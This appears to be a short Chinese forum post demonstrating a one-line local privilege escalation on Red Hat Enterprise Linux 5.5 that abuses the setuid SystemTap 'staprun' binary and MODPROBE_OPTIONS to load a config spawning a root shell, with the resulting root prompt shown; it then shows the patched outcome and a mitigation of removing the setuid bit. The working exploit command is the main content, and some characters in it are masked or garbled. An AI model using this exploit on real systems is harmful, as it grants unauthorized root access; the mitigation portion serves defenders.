linux一句话轻松提权

发布于 2019-09-26 作者 风铃 216次 浏览 版块 前端



linux命令:‍

[b@fuckks~]$ printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTI**=“-C exploit.conf” staprun -u whatever

sh-3.2# uname -a

Linux xlsec 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:43 EDT 2010 i686 i686 i386 GNU/Linux

sh-3.2# cat /etc/redhat-release

Red Hat Enterprise Linux Server release 5.5 (Tikanga)

sh-3.2#



去打补丁吧,补上补丁之后的效果如下:



‍[b@fuckks~]$ printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTI=“-C exploit.conf” staprun -u whatever


-bash: /usr/bin/staprun: Permission denied

[b@fuckks~]$



linux批量打补丁)没有补丁的,把‍/usr/bin/staprun这个东西的s位去掉,也可以应付的哦,如下:

[a@fuckks2~]$ printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTI=“-C exploit.conf” staprun -u whatever

ERROR: The effective user ID of staprun must be set to the root user.

Check permissi** on staprun and ensure it is a setuid root program.


[a@fuckks2~]$



注:此类漏洞常被不少用于web注入的木马以达到快速提权侵占系统的目的


收藏
暂无回复